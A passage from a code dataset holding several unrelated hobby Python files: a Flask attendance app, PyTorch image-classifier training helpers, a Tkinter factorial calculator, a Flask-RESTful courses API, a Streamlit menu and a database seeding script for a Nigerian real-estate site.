new_semester=myModule.mergeUploadedFile(uploaded_file_names)\n new_semester.to_csv(merge_path+\"new_semester.csv\",index=False)\n flash('System Loaded Successfully','bg-success')\n return 
redirect(url_for('loaded_file'))\n\n\n\n@app.route(\"/loaded-file\")\ndef loaded_file():\n file_path = glob.glob(upload_path+'*')\n file_names=[]\n try:\n for f in file_path:\n file_names.append(f)\n return render_template(\"loaded_file.html\",files=file_names)\n except:\n return render_template(\"loaded_file.html\")\n\n\n@app.route(\"/get-attendance\")\ndef get_attendance():\n return render_template(\"find_attendance.html\")\n\n@app.route(\"/find-attendance\",methods=['POST'])\ndef find_attendance():\n if request.method == 'POST':\n res=myModule.isLoaded()\n if(res!=True):\n flash('System not Loaded','bg-danger')\n return redirect(url_for('home'))\n\n student_id = request.form['student_id']\n attendance=myModule.getAttendance(student_id)\n attendance=attendance.to_dict('records')\n # return attendance\n return render_template(\"find_attendance.html\",attendance=attendance,student_id=student_id)\n\n@app.route('/demo-download')\ndef demo_download():\n return send_file(\n 'static/demo/demo.xlsx',\n mimetype='text/xlsx',\n download_name='demo.xlsx',\n as_attachment=True\n )\n@app.route('/reset-system')\ndef reset_system():\n res=myModule.clearPath(upload_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n res=myModule.clearPath(merge_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n flash('System Reseted Successfully','bg-success')\n return redirect(url_for('loaded_file'))\n\n\n\n\n \n\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('error.html'), 404\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"asad-cuet/Semester-Attendance-V1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24278071377","text":"# Helper functions for train.py and predict.py\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nfrom PIL import Image\n\nimport json\nimport torch\nimport os.path\nimport numpy as np\n\n\n# <---train.py start--->\ndef import_data(data_dir, batch_size, arch):\n \"\"\"\n Loads a dataset from a directory and performs preproccessing, normalization,\n and training data augmentation.\n\n The data directory must have sub folders \"train\", \"valid, and \"test\" containing\n the necessary classes/data. 
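    Example (illustrative sketch only; 'flowers' is a hypothetical data
    directory, and the shapes assume arch='vgg16' with batch_size=32):

        train, val, test, c2i = import_data('flowers', 32, 'vgg16')
        images, labels = next(iter(train))  # images.shape == [32, 3, 224, 224]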
See PyTorch datasets.ImageFolder for more info.\n\n Args:\n data_dir: Directory path of model data (string)\n batch_size: Training batch size (int)\n arch: PyTorch architecture to use for transfer learning from torchvision.models (string)\n\n Returns:\n Model ready training, validation, test, and class to index mappings data\n as a tuple of PyTorch Dataloader objects\n IE: (train, val, test, class_to_indexes)\n \"\"\"\n\n # PyTorch model normalization and standard deviation values\n # https://pytorch.org/docs/stable/torchvision/models.html\n mean=[0.485, 0.456, 0.406]\n std=[0.229, 0.224, 0.225]\n\n # Determine the min image size for diffrent classifier models\n if arch == 'inception_v3': # Inception needs 299px despite documentation listing 224px\n model_size = 299\n else:\n model_size = 224\n\n # Directory information split\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n\n # Perform data augmentation in addition to resizing and normalizing training data\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomResizedCrop(model_size),\n transforms.ToTensor(), # <-- Needed to convert PIL images to pytorch tensors\n transforms.Normalize(mean=mean, std=std)])\n\n # Just resize and normalize validation and testing data\n test_val_transforms = transforms.Compose([transforms.Resize((model_size, model_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\n # Load the datasets with ImageFolder\n train_dataset = datasets.ImageFolder(train_dir, transform=train_transforms)\n val_dataset = datasets.ImageFolder(valid_dir, transform=test_val_transforms)\n test_dataset = datasets.ImageFolder(test_dir, transform=test_val_transforms)\n\n # Using the image datasets and the transforms, define the dataloaders\n train_data = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n val_data = DataLoader(val_dataset, batch_size=batch_size, shuffle=True)\n test_data = DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n return train_data, val_data, test_data, train_dataset.class_to_idx\n\ndef get_category_names(file):\n \"\"\"\n Gets category names from a json file.\n\n Args:\n file: file containing category class:name mappings (json file)\n\n Returns:\n Python dictionary of class:names\n IE: {'1':'name'}\n \"\"\"\n\n # Open the file and return a python dict\n with open(file, 'r') as f:\n cat_to_name = json.load(f)\n\n return cat_to_name\n\ndef build_model(arch, hidden_units, learn_rate):\n \"\"\"\n Builds a PyTorch transfer learning model as specified.\n\n Args:\n arch: PyTorch architecture to be used for transfer learning (string)\n hidden_units: number of hidden units for the fully connected layers (int)\n learn_rate: the learning rate to be used with the model for training (float)\n\n Returns:\n A PyTorch transfer learning model with a new user defined classifer ready for training and\n a equally prepared optimzer as tuple\n IE: (model, optimizer)\n \"\"\"\n\n # Download the architecture selected\n model = getattr(models, arch)(pretrained=True)\n\n # Freeze weights to reuse with new classifier for transfer learning\n for parameter in model.parameters():\n parameter.requires_grad = False\n\n # Identify the classifier so it can be replaced with the user's specification\n possible_classifier_matches = []\n for name, layer in model.named_children():\n if isinstance(layer, torch.nn.modules.linear.Linear) or 
isinstance(layer, torch.nn.modules.container.Sequential):\n possible_classifier_matches.append((name, layer))\n\n # Get the last match to get the name of the classifier for replacement\n classifier = possible_classifier_matches[-1]\n c_name = classifier[0]\n c_layer = classifier [1]\n\n # Get the classifiers input dimensions to so a new model can be built\n # Find the first linear layer if its a sequential module, otherwise just get the linear layer input features\n if isinstance(c_layer, torch.nn.modules.container.Sequential):\n for layer in c_layer:\n try:\n in_features = layer.in_features\n break\n except AttributeError:\n pass\n else:\n in_features = getattr(model, c_name).in_features\n\n # Define a new classifier using the inputed parameters\n new_classifier = torch.nn.Sequential(OrderedDict([\n ('fc1', torch.nn.Linear(in_features, hidden_units)),\n ('relu1', torch.nn.ReLU()),\n ('dropout1', torch.nn.Dropout(p=0.5)),\n ('fc2', torch.nn.Linear(hidden_units, 102))\n ]))\n\n # Replace the classifier with the user defined\n setattr(model, c_name, new_classifier)\n\n # Now that the model is prepared set up an optimizer with the new classifier configured\n # Only pass the optimizer the NEW classifier weights\n # IE: \"model.NEW_LAYERS.parameters()\"\n # model.parameters() returns all trainable pytorch parameters like weights and biases\n optimizer = torch.optim.Adam(getattr(model, c_name).parameters(), lr=learn_rate)\n\n return model, optimizer\n\ndef validation(model, data, criterion, device):\n \"\"\"\n Computes the accuracy and loss of a model.\n\n Args:\n model: pytorch model\n data: validation or testing data (Dataloader object)\n criterion: loss function being used\n device: device used for pytorch training ('cuda:0' or 'cpu')\n\n Returns:\n Model loss and model accuracy as a tuple\n IE: (loss, accuracy)\n \"\"\"\n\n # Keep track of the validation loss and accuracy\n val_loss = 0\n val_accuracy = 0\n\n # Loop through the data in batches\n for images, labels in data:\n # Send the training data to the designated device for computation\n images, labels = images.to(device), labels.to(device)\n\n # Forward pass, when not in training mode aux_logits is not returned\n outputs = model.forward(images)\n\n # Get the probabilites from the logits\n probs = torch.nn.functional.softmax(outputs, dim=1) # Get the probabilities for the output logits like the criterion\n predictions = probs.max(dim=1) # Get the max value indexes across the probabilities vectors (batch_size, vector_of_probabilities)\n\n # Check the accuracy of the predictions against labels\n # Equality is a byte tensor that needs to be converted to a float tensor\n equality = labels.data == predictions[1]\n val_accuracy += equality.type(torch.FloatTensor).mean()\n\n # Calculate the error\n loss = criterion(outputs, labels)\n val_loss += loss.item() # Get a scaler value from pytorch tensor\n\n return val_loss, val_accuracy\n\ndef train(model, train_data, val_data, optimizer, epochs, gpu):\n \"\"\"\n Trains a PyTorch model.\n\n Args:\n model: pytorch model\n train_data: training data (Dataloader object)\n val_data: validation data\n optimizer: pytorch optimizer to be used with the model\n epochs: number of training loops (int)\n gpu: train on gpu (bool)\n\n Returns:\n A trained version of the model passed in\n \"\"\"\n\n # Loss function\n criterion = torch.nn.CrossEntropyLoss() # This criterion combines nn.LogSoftmax() and nn.NLLLoss() in one single class\n\n # Train on a gpu or cpu depending on settings\n device = 
torch.device(\"cuda:0\" if gpu==True else \"cpu\")\n model.to(device)\n\n print(\"Starting training...\")\n\n # Loop over training data\n for epoch in range(epochs - 1):\n # Make sure the model is in training mode\n model.train()\n # Keep track of the loss between training batches\n running_loss = 0\n\n # Loop through the training data in batches\n for images, labels in train_data:\n # Send the training data to the designated device for computation\n images, labels = images.to(device), labels.to(device)\n\n # Zero out gradients for the next training pass\n optimizer.zero_grad()\n\n # Forward pass\n try:\n outputs = model.forward(images)\n except ValueError:\n # Inception V3 is probably being used, use inceptions logits and not aux_logits,\n # Inception is unique in this regard\n outputs, _ = model.forward(images)\n\n # Calculate the error\n loss = criterion(outputs, labels)\n running_loss += loss.item() # Get scaler value from pytorch tensor\n\n # Backprop the error and calculate the gradients for each layer\n loss.backward()\n\n # Update the weights to adjust for the error based on the gradients\n optimizer.step()\n\n # Evaluate the model to check progress\n with torch.no_grad(): # Turn off gradients to speed up inference\n # Change model to evaluation mode for inference\n model.eval()\n # Evaluate the model accuracy after adjusting the weights\n val_loss, val_accuracy = validation(model, val_data, criterion, device)\n\n # Print results per epoch\n print(\"Epoch: {0}/{1} | Training Error: {2:.2f} | Validation Error: {3:.2f} | Validation Accuracy: {4:.2f}%\".format(epoch + 1,\n epochs,\n running_loss,\n val_loss,\n val_accuracy/len(val_data)*100))\n\n print(\"Training complete!\")\n return model\n\ndef save(model, arch, class_to_idx, cat_to_name, save_dir):\n \"\"\"\n Saves a trained model and associated information into a checkpoint that can\n be loaded and used later.\n\n Args:\n model: trained pytorch model\n arch: PyTorch architecture to be used for transfer learning (string)\n class_to_idx: class to index mapping via ImageFolderDataset.class_to_idx\n cat_to_name: class:name dict mappings\n save_dir: directory to save the checkpoint (string)\n\n Returns:\n None\n \"\"\"\n\n print(\"Saving model\")\n\n # Save the mapping of classes to indices\n model.class_to_idx = class_to_idx\n model.name = arch\n # Create a checkpoint with useful information about the model\n checkpoint = {'transfer_learning_model': model.name,\n 'model': model,\n 'class_to_idx': model.class_to_idx,\n 'classes': cat_to_name,\n 'pytorch_version': '0.4.0'}\n\n # Save the checkpoint in the project directory\n torch.save(checkpoint, os.path.join(save_dir, model.name + '_checkpoint.pth'))\n print(\"Model saved!\")\n\n# <---train.py end--->\n\n# <---predict.py start--->\ndef load_checkpoint(filepath, gpu):\n \"\"\"\n Loads a PyTorch checkpoint on to the desired compute device,\n as long as the compute device is available.\n IE: CUDA enabled GPUs\n\n Args:\n filepath: path to a PyTorch checkpoint (string)\n gpu: use gpu (bool)\n\n Returns:\n Pytorch model and the checkpoint dict as a tuple\n \"\"\"\n\n # https://pytorch.org/docs/stable/torch.html?highlight=torch%20load#torch.load\n # https://discuss.pytorch.org/t/on-a-cpu-device-how-to-load-checkpoint-saved-on-gpu-device/349/3\n checkpoint = torch.load(filepath, map_location=lambda storage, loc: storage.cuda(0) if gpu and torch.cuda.is_available() else storage)\n model = checkpoint['model']\n\n return model, checkpoint\n\ndef process_image(image_path, model):\n \"\"\"\n 
Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns a Pytorch tensor.\n\n Args:\n image_path: path to an image\n model: pytorch model to be used\n\n Returns:\n PyTorch tensor ready to be fed into a model\n \"\"\"\n\n # Determine the min image size for diffrent classifier models\n if model.name == 'inception_v3': # Inception needs 299px despite documentation listing 224px\n # Minimum image size required by the network (Inception V3 needs 299px instead of 224px)\n shortest_side = (326, 326)\n min_image_size = 299\n else:\n shortest_side = (256, 256)\n min_image_size = 224\n\n\n im = Image.open(image_path)\n im.thumbnail(shortest_side) # Resize while maintaining aspect ratio\n\n # Find the center of the image and crop based on width and height\n width, height = im.size\n\n # Find the cartesian coordinates for cropping center\n left = (width - min_image_size)//2\n top = (height - min_image_size)//2\n right = (width - min_image_size)//2 + min_image_size\n bottom = (height - min_image_size)//2 + min_image_size\n\n # Crop center of the image to (229px x 229px)\n im = im.crop((left, top, right, bottom))\n\n # Convert to numpy array to normalize\n np_image = np.array(im)\n # print(\"Original pixel mean: {}\".format(np_image.mean()))\n\n # Scale the image RGB values from (0 - 255) --> (0.0 - 1.0)\n np_image = np_image / 255\n # print(\"Rescaled pixel mean: {}\".format(np_image.mean()))\n # print(\"-\" *40)\n\n # PyTorch model normalization and standard deviation values\n # https://pytorch.org/docs/stable/torchvision/models.html\n means = np.array([0.485, 0.456, 0.406])\n stds = np.array([0.229, 0.224, 0.225])\n np_image = (np_image - means) / stds # Normalize\n # print(\"Normalized pixel mean: {}\".format(np_image.mean()))\n # print(\"-\" *40)\n\n # Transpose the positions of the array to D, H, W like pytorch tensors\n # print(\"Old shape: {}\".format(np_image.shape))\n np_image = np_image.transpose(2, 0, 1)\n # print(\"New shape: {}\".format(np_image.shape))\n\n # Convert to pytorch tensor\n torch_tensor_image = torch.from_numpy(np_image)\n\n # Cast to FloatTensor from DoubleTensor to match weight dtype for predictions\n torch_tensor_image = torch_tensor_image.type(torch.FloatTensor)\n\n return torch_tensor_image\n\ndef predict(image_path, model, gpu, topk, cat_to_name=None):\n \"\"\"\n Predict the class (or classes) of an image using a trained model.\n\n Args:\n image_path: path to an image for inference (string)\n model: trained model to be used (PyTorch model)\n gpu: use gpu (bool)\n topk: number of classes/ labels to output (int)\n cat_to_name: file containing class to label mappings (json file)\n\n Returns:\n None\n \"\"\"\n\n # Make sure the model is in evaluation mode, send to process device\n model.eval()\n device = torch.device(\"cuda:0\" if gpu==True else \"cpu\")\n model.to(device)\n\n # Preprocess the image for the network, convert to pytorch tensor, send to process device\n image = process_image(image_path, model)\n image.unsqueeze_(0) # Add the \"batch_size\" at position 0 in the tensor, IE: (1, D, H, W), this is required for single images\n image = image.to(device)\n\n # Turn off gradients and make a forward pass\n with torch.no_grad():\n outputs = model.forward(image)\n\n # Get the probabilities with the corresponding indexes\n probs = torch.nn.functional.softmax(outputs, dim=1)\n probs, idxs = probs.topk(topk)\n\n # Invert the class_to_index dictionary to use the topk indexes to look up dataset class numbers\n # from the ImageFolder class/index mappings\n # IE: 
{class_number:index_value} --> {index_value:class_number}\n idx_to_class = dict(map(reversed, model.class_to_idx.items()))\n\n # If topk is greater then 1 we have a list\n if topk > 1:\n # Map the indexes to the correct classes and make a python list\n classes = [idx_to_class[idx] for idx in idxs.squeeze_().tolist()]\n # Convert from pytorch tensor to python list\n probs = probs.squeeze_().tolist()\n # If topk is less then 2 we are no longer working with a list, just a single value\n elif topk < 2:\n classes = idx_to_class[idxs.squeeze_().item()]\n probs = probs.squeeze_().item()\n\n # Return the real name labels instead of classes\n if cat_to_name is not None and topk > 1:\n names = get_category_names(cat_to_name)\n classes = [names[i] for i in classes]\n elif cat_to_name is not None and topk < 2:\n names = get_category_names(cat_to_name)\n classes = names[classes]\n\n print(\"Probs: {} Classes: {}\".format(probs, classes))\n# <---predict.py end--->","repo_name":"Fury1/Deep-Learning-with-Python-and-Pytorch","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":17753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13618392320","text":"#Calcula factorial pro max 4k no fake 1 link mega\n#Nicolas Escandon Varela 2205629\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import simpledialog\n\ndef principal():\n r = messagebox.askyesno(message=\"¿Quieres calcular un factorial?\", title=\"uwu\")\n while r == True:\n numero1 = simpledialog.askinteger(\"\", \"Digite un numero\")\n \n total_factorial = calcularFactorial(numero1)\n \n\n reporteT.config(state=\"normal\")\n reporteT.insert(INSERT, str(numero1) + \"!\" + \" = \" + total_factorial +\"\\n\")\n reporteT.config(state=\"disable\")\n\n r = messagebox.askyesno(message=\"¿Quieres calcular otro factorial?\", title=\"uwu\")\n\ndef calcularFactorial(numero1):\n if numero1 <0:\n numero1 = abs(numero1)\n x = 0\n total_factor = 1\n for x in range(1, numero1+1, 1):\n total_factor = total_factor * x\n\n return \"-\" + str(total_factor)\n else:\n x = 0\n total_factor = 1\n for x in range(1, numero1+1, 1):\n total_factor = total_factor * x\n\n return str(total_factor) \n\ndef salir():\n raiz.destroy()\n\ndef borrar():\n reporteT.config(state=\"normal\")\n reporteT.delete(\"1.0\",\"end\")\n reporteT.config(state=\"disable\")\n\nraiz = Tk()\nraiz.geometry(\"450x260\")\nraiz.title(\"Programa que calcula factorial\")\n\n\nmarco1 = Frame(raiz)\nmarco1.config(bd=3, relief=\"sunken\")\nmarco1.pack(pady=10)\niniciarB = Button(marco1, text=\"Iniciar\", command = principal)\niniciarB.grid(row=0,column=0,padx=3, pady=3)\nsalirB = Button(marco1, text=\"Salir\", command=salir)\nsalirB.grid(row=0,column=1,padx=3, pady=3)\nborrarB = Button(marco1, text=\"Borrar\", command=borrar)\nborrarB.grid(row=0,column=2,padx=3, pady=3)\n\n\nmarco2 = LabelFrame(raiz, text=\"Resultados\")\nmarco2.config(bd=3, relief=\"sunken\")\nmarco2.pack()\nreporteT = Text(marco2)\nreporteT.config(state=\"disable\", width=50, height=10)\nreporteT.grid(row=0, column=0)\n\nraiz.mainloop()\n","repo_name":"NEV117/cosas-de-python","sub_path":"Calculadora Factorial Robusta.py","file_name":"Calculadora Factorial Robusta.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25262336924","text":"from flask_restful import Resource, reqparse, abort\r\n\r\ncourses_post_args = 
reqparse.RequestParser()\r\ncourses_post_args.add_argument(\r\n \"title\", type=str, help=\"Title of the course is required.\", required=True)\r\ncourses_post_args.add_argument(\r\n \"description\", type=str, help=\"Description of the course is required.\", required=True)\r\ncourses_post_args.add_argument(\r\n \"teacher\", type=str, help=\"Teacher of the course is required.\", required=True)\r\n\r\ncourses = []\r\n\r\n\r\ndef getCourseById(courseId):\r\n for course in courses:\r\n if(str(course[\"id\"]) == str(courseId)):\r\n return course\r\n return False\r\n\r\n\r\ndef abortIfCourseDoesNotExist(courseId):\r\n if (getCourseById(courseId) == False):\r\n abort(404, message=\"A course with that ID does not exist...\")\r\n\r\n\r\ndef abortIfCourseExists(courseId):\r\n if(getCourseById(courseId)):\r\n abort(409, message=\"A course with that ID already exists...\")\r\n\r\n\r\nclass Courses(Resource):\r\n def get(self, courseId):\r\n abortIfCourseDoesNotExist(courseId)\r\n return getCourseById(courseId)\r\n\r\n def post(self, courseId):\r\n abortIfCourseExists(courseId)\r\n\r\n args = courses_post_args.parse_args()\r\n\r\n newCourse = dict({\r\n \"id\": courseId,\r\n **args\r\n })\r\n courses.append(newCourse)\r\n return {\"message\": \"Course successfully created!\"}\r\n","repo_name":"rachzy/video-creator","sub_path":"server/Routers/Courses/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27945187061","text":"# Сформировать (не программно) текстовый файл.\r\n# В нём каждая строка должна описывать учебный предмет и наличие лекционных, практических и лабораторных занятий по\r\n# предмету. Сюда должно входить и количество занятий. Необязательно, чтобы для каждого предмета были все типы занятий.\r\n# Сформировать словарь, содержащий название предмета и общее количество занятий по нему. 
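# (Illustrative sketch in English, not part of the original assignment: the
#  parsing implemented below reduces to split-on-':' plus summing the number
#  that precedes each '(' in the hour tokens.)
_line = "Информатика: 100(л) 50(пр) 20(лаб)"
_subject, _hours = _line.split(':')
_total = sum(int(_tok.split('(')[0]) for _tok in _hours.split())
assert (_subject, _total) == ("Информатика", 170)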
Вывести его на экран.\r\n# Примеры строк файла: Информатика: 100(л) 50(пр) 20(лаб).\r\n# Физика: 30(л) — 10(лаб)\r\n# Физкультура: — 30(пр) —\r\n# Пример словаря: {“Информатика”: 170, “Физика”: 40, “Физкультура”: 30}\r\n\r\n# Импортируем работы с аргументами и именами частей файла\r\nfrom sys import argv\r\n\r\n\r\ndef process_file(input_file_name):\r\n # создаем словарь предметов, где предмет - ключ, а значение - общее число занятий\r\n out_list = {}\r\n\r\n try:\r\n\r\n # Открываем файл на чтение\r\n file_obg = open(input_file_name, 'r', encoding='utf-8')\r\n\r\n # обходим все строки в файле по следующей схеме\r\n # сначал строку делим по знаку ':' - получаем предмет и часы\r\n # часы делим по пробелам, а дальше отсекаем число до скобки\r\n for file_line in file_obg:\r\n\r\n think_data = file_line.split(':')\r\n # предмет\r\n think_name = think_data[0].replace('\\ufeff', '')\r\n exist_hours = out_list.get(think_name)\r\n # часы\r\n hours = think_data[1].split()\r\n for el in hours:\r\n kind = el.split('(')\r\n if exist_hours is None:\r\n exist_hours = int(kind[0])\r\n else:\r\n exist_hours += int(kind[0])\r\n\r\n out_list.update({think_name: exist_hours})\r\n\r\n print(out_list)\r\n\r\n except IOError:\r\n # в случае ошибки ввода вывода - сообщаем\r\n print(\"Ошибка ввода-вывода в файл\")\r\n\r\n except ValueError:\r\n # в случае если аргументов мало - сообщаем\r\n exit(\"Файл данных содержит ошибку\")\r\n\r\n finally:\r\n # не забываем закрывать файл\r\n file_obg.close()\r\n\r\n\r\n# Получаем из командной строки путь к файлу, выработку в часах, ставку за час, премию\r\ntry:\r\n name, input_file = argv\r\n print(f'input : {input_file}')\r\n\r\n process_file(input_file)\r\n\r\nexcept ValueError:\r\n # в случае если аргументов мало - сообщаем\r\n exit(\"Необходимо указать имя входного файла как первый параметр строки запуска скрипта\")\r\n","repo_name":"guyseptimiy/Lesson5","sub_path":"Lesson-05-Task-06.py","file_name":"Lesson-05-Task-06.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30421270039","text":"class LocationBuilder:\n def __init__(self, rows, cols):\n self.rows = rows\n self.cols = cols\n self.location = self.create_location()\n\n def create_location(self):\n location = {}\n for r in range(self.rows):\n row = {}\n for c in range(self.cols):\n row[c] = Cell()\n location[r] = row\n return location\n","repo_name":"beLIEveMePLz/Your-choice-Ren-py-by-ChatGPT-","sub_path":"Systems/Location Editor/automation 0.4.3.py","file_name":"automation 0.4.3.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71796454520","text":"import streamlit as st\n\n# Set the page config at the very top of your script\nst.set_page_config(page_title=\"Squire\", page_icon=\"Squire_GPT/ASSETS/pixel_pencil.png\", layout='wide')\n\nfrom chatUI import chatbot_ui_page\nfrom SpearHead_Library import spearhead_library\n\ndef main():\n st.sidebar.title(\"Navigation\")\n selection = st.sidebar.radio(\"Go to\", [\"Home\", \"Brain_Storm\", \"SpearHead_Library\"])\n\n if selection == \"Home\":\n home_page()\n elif selection == \"Brain_Storm\":\n chatbot_ui_page()\n elif selection == \"SpearHead_Library\":\n spearhead_library()\n \n\ndef home_page():\n st.title(\"Welcome to Squire :scales:\")\n \n st.write(\"On the sidebar you can select between the Brain_Storm tool of the SpearHead_Library tool.\")\n\n\n\nif 
__name__ == \"__main__\":\n main()\n","repo_name":"Madlittledude/Squire_1","sub_path":"Squire_GPT/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37896467992","text":"from buddy.models.properties_model import State, PropertyCategory\nfrom buddy.models.properties_model import Feature_types,Features\nfrom buddy.models.user_model import User_types, Users, Groups\nfrom buddy.models.blogs_model import BlogCategory\nfrom buddy.models.q_model import QCategory, Questions, Answers\n#from buddy.models.city_model import FeatureToRate\n\nfrom buddy.models import DBSession\nimport transaction\n\n\ndef populate_userTypes():\n usertypes = [u'Buyer/Seller',u'Real Estate Developer/Builder',u'Real Estate Agent',u'Mortgage Lender',u'LandLord',\n u'Real Estate Broker',u'Property Manager',u'Other/just Looking']\n with transaction.manager:\n for name in usertypes:\n typs = User_types(\n name)\n DBSession.add(typs)\n\ndef populate_category():\n root_category_1 = PropertyCategory(name=u'Residential')\n #Adding subcategories for Residential,\n\n #PropertyCategory(u\"Multistorey Apartment/Flat\",parent=root_category_1)\n #PropertyCategory(u\"Story Apartment/Flat\", parent=root_category_1)\n PropertyCategory(u\"Flat\",parent=root_category_1)\n PropertyCategory(u\"Residential House\",parent=root_category_1)\n PropertyCategory(u\"Residential Land\", parent=root_category_1)\n #PropertyCategory(u\"Self-Contained/Studio House\",parent=root_category_1)\n #PropertyCategory(u\"Serviced Apartment\",parent=root_category_1)\n #PropertyCategory(u\"Penthouse\",parent=root_category_1)\n\n\n root_category_2 = PropertyCategory(name=u\"Commercial\")\n #Adding subcategories for commercial\n PropertyCategory(u\"Office space\",parent=root_category_2)\n PropertyCategory(u\"Commercial Shop\",parent=root_category_2)\n PropertyCategory(u\"Space in Shopping Mall\",parent=root_category_2)\n PropertyCategory(u\"Commercial Showroom\",parent=root_category_2)\n #PropertyCategory(u\"Business Centre\",parent=root_category_2)\n PropertyCategory(u\"Commercial Land\",parent=root_category_2)\n PropertyCategory(u\"Warehouse\",parent=root_category_2)\n PropertyCategory(u\"Guest House\",parent=root_category_2)\n PropertyCategory(u\"Hotel\",parent=root_category_2)\n PropertyCategory(u\"Hotel Sites\",parent=root_category_2)#land\n PropertyCategory(u\"Industrial Land\",parent=root_category_2)\n PropertyCategory(u\"Industrial Building\",parent=root_category_2)\n\n\n root_category_3 = PropertyCategory(name=u\"Agricultural\")\n #adding subcategories for Agricultural\n PropertyCategory(u\"Agricultural Land\",parent=root_category_3)\n PropertyCategory(u\"Farm House\",parent=root_category_3)\n\n with transaction.manager:\n DBSession.add_all([root_category_1, root_category_2, root_category_3])\n\n\ndef populate_location():\n states=[u\"Abuja\",u\"Abia\",u\"Anambra\",u\"Adamawa\",u\"Akwa Ibom\",u\"Bauchi\",u\"Benue\",\n u\"Bayelsa\",u\"Borno\",u\"Cross River\",u\"Enugu\",u\"Ebonyi\",u\"Edo\",u\"Ekiti\",u\"Delta\",\n u\"Gombe\",u\"Imo\",u\"Jigawa\",u\"Kebbi\",u\"Kogi\",u\"Kwara\",u\"Kano\",u\"Kaduna\",u\"Katsina\",\n u\"Lagos\",u\"Nasarawa\",u\"Niger\",u\"Osun\",u\"Ogun\",u\"Oyo\",u\"Ondo\",u\"Rivers\",u\"Plateau\",\n u\"Taraba\",u\"Sokoto\",u\"Yobe\",u\"Zamfara\"]\n with transaction.manager:\n for state in states:\n s = State(state)\n DBSession.add(s)\n\ndef add_blog_category():\n c1 = BlogCategory(name=u'Home selling')\n c2 = 
BlogCategory(name=u'Mortgage')\n c3 = BlogCategory(name=u'Rentals')\n c4 = BlogCategory(name=u'Local topics')\n c5 = BlogCategory(name=u'Home ownership')\n c6 = BlogCategory(name=u'Pro-to-pro')\n c7 = BlogCategory(name=u'Home buying')\n c8 = BlogCategory(name=u'Nairabricks Blogs')\n\n home_selling = [u'Selling process',u'Pricing',u'When to sell',\n u'Housing market', u'for sale by owner']\n mortgage = [u'mortgage rates',u'refinance',u'home equity loans',u'credit scores',\n u'approval process',u'mortgage types',u'loan modifications']\n rental = [u'rental market',u'finding a rental',u'Rental rights']\n local = [u'neighborhoods',u'market conditions',u'schools',u'crime',u'Parks and Recreation',u'Local Info']\n ownership = [u'home improvement',u'maintenance',u'taxes',u'insurance']\n pro = [u'agents',u'lenders',u'landlords',u'other pros',u'success stories']\n home_buying = [u'buying process',u'buying a foreclosure',u'rent vs buy',u'investing']\n nairabricks = [u'for sale listing',u'rental listing',u'Bugs & Suggestions',\n u'Discussion']\n with transaction.manager:\n for c in home_selling:\n q = BlogCategory(name=c,parent=c1)\n for c in mortgage:\n q = BlogCategory(name=c,parent=c2)\n for c in rental:\n q = BlogCategory(name=c,parent=c3)\n for c in local:\n q = BlogCategory(name=c,parent=c4)\n for c in ownership:\n q = BlogCategory(name=c,parent=c5)\n for c in pro:\n q = BlogCategory(name=c,parent=c6)\n for c in home_buying:\n q = BlogCategory(name=c,parent=c7)\n for c in nairabricks:\n q = BlogCategory(name=c,parent=c8)\n DBSession.add_all([c1,c2,c3,c4,c5,c6,c7,c8])\n'''\ndef add_Qcategory():\n c1 = QCategory(name=u'Home selling')\n c2 = QCategory(name=u'Mortgage')\n c3 = QCategory(name=u'Rentals')\n c4 = QCategory(name=u'Local topics')\n c5 = QCategory(name=u'Home ownership')\n c6 = QCategory(name=u'Pro-to-pro')\n c7 = QCategory(name=u'Home buying')\n c8 = QCategory(name=u'Nairabricks Questions')\n\n home_selling = [u'Selling process',u'Pricing',u'When to sell',\n u'Housing market', u'for sale by owner']\n mortgage = [u'mortgage rates',u'refinance',u'home equity loans',u'credit scores',\n u'approval process',u'mortgage types',u'loan modifications']\n rental = [u'rental market',u'finding a rental',u'Rental rights']\n local = [u'neighborhoods',u'market conditions',u'schools',u'crime',u'Parks and Recreation',u'Local Info']\n ownership = [u'home improvement',u'maintenance',u'taxes',u'insurance']\n pro = [u'agents',u'lenders',u'landlords',u'other pros',u'success stories']\n home_buying = [u'buying process',u'buying a foreclosure',u'rent vs buy',u'investing']\n nairabricks = [u'for sale listing',u'rental listing',u'Bugs & Suggestions',\n u'Discussion']\n with transaction.manager:\n for c in home_selling:\n q = QCategory(name=c,parent=c1)\n for c in mortgage:\n q = QCategory(name=c,parent=c2)\n for c in rental:\n q = QCategory(name=c,parent=c3)\n for c in local:\n q = QCategory(name=c,parent=c4)\n for c in ownership:\n q = QCategory(name=c,parent=c5)\n for c in pro:\n q = QCategory(name=c,parent=c6)\n for c in home_buying:\n q = 